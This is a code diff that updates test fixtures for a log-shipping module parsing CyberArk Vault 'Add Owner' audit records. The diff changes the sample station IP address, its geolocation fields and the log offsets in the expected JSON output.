+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Batch","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Operators","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Backup Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"DR Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Notification Engines","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:36","IsoTimestamp":"2021-03-10T09:11:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAGWAccounts","TargetUser":"","Safe":"PSMPADBUserProfile","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:37Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:37","IsoTimestamp":"2021-03-10T09:11:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"PSMPADBridgeConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:38Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:38","IsoTimestamp":"2021-03-10T09:11:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"PSMPADBridgeCustom","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T17:59:32Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:32","IsoTimestamp":"2021-03-10T17:59:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/32_add_owner.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/32_add_owner.log-expected.json
index 8cff9f6ba312..9ec595836948 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/32_add_owner.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/32_add_owner.log-expected.json
@@ -10,7 +10,7 @@
         "cyberarkpas.audit.safe": "PSMPConf",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "Master",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
         "event.action": "add owner",
         "event.category": [
@@ -37,23 +37,20 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
             "Master"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -72,7 +69,7 @@
         "cyberarkpas.audit.safe": "PSMPConf",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "Administrator",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
         "event.action": "add owner",
         "event.category": [
@@ -92,29 +89,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 568,
+        "log.offset": 567,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -133,7 +127,7 @@
         "cyberarkpas.audit.safe": "PSMPConf",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "Batch",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
         "event.action": "add owner",
         "event.category": [
@@ -153,30 +147,27 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 1143,
+        "log.offset": 1141,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
             "Batch"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -195,7 +186,7 @@
         "cyberarkpas.audit.safe": "PSMPConf",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "Operators",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
         "event.action": "add owner",
         "event.category": [
@@ -215,30 +206,27 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 1710,
+        "log.offset": 1707,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
             "Operators"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -257,7 +245,7 @@
         "cyberarkpas.audit.safe": "PSMPConf",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "Backup Users",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
         "event.action": "add owner",
         "event.category": [
@@ -277,30 +265,27 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 2281,
+        "log.offset": 2277,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
             "Backup Users"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -319,7 +304,7 @@
         "cyberarkpas.audit.safe": "PSMPConf",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "Auditors",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
         "event.action": "add owner",
         "event.category": [
@@ -339,30 +324,27 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 2855,
+        "log.offset": 2850,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
             "Auditors"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -381,7 +363,7 @@
         "cyberarkpas.audit.safe": "PSMPConf",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "DR Users",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
         "event.action": "add owner",
         "event.category": [
@@ -401,30 +383,27 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 3425,
+        "log.offset": 3419,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
             "DR Users"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -443,7 +422,7 @@
         "cyberarkpas.audit.safe": "PSMPConf",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "Notification Engines",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
         "event.action": "add owner",
         "event.category": [
@@ -463,30 +442,27 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 3995,
+        "log.offset": 3988,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
             "Notification Engines"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -505,7 +481,7 @@
         "cyberarkpas.audit.safe": "PVWAConfig",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMPApp_localhost.localdomain",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:22",
         "event.action": "add owner",
         "event.category": [
@@ -525,30 +501,27 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 4577,
+        "log.offset": 4569,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
             "PSMPApp_localhost.localdomain"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -567,7 +540,7 @@
         "cyberarkpas.audit.safe": "PSMPLiveSessions",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMAppUsers",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:23",
         "event.action": "add owner",
         "event.category": [
@@ -587,30 +560,27 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 5170,
+        "log.offset": 5161,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
             "PSMAppUsers"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -629,7 +599,7 @@
         "cyberarkpas.audit.safe": "PSMPConf",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "Vault Admins",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:23",
         "event.action": "add owner",
         "event.category": [
@@ -649,30 +619,27 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 5751,
+        "log.offset": 5741,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
             "Vault Admins"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -691,7 +658,7 @@
         "cyberarkpas.audit.safe": "PSMPLiveSessions",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PVWAAppUsers",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:23",
         "event.action": "add owner",
         "event.category": [
@@ -711,30 +678,27 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 6325,
+        "log.offset": 6314,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
             "PVWAAppUsers"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -753,7 +717,7 @@
         "cyberarkpas.audit.safe": "PSMPADBUserProfile",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PVWAGWAccounts",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:36",
         "event.action": "add owner",
         "event.category": [
@@ -773,30 +737,27 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 6907,
+        "log.offset": 6895,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
             "PVWAGWAccounts"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -815,7 +776,7 @@
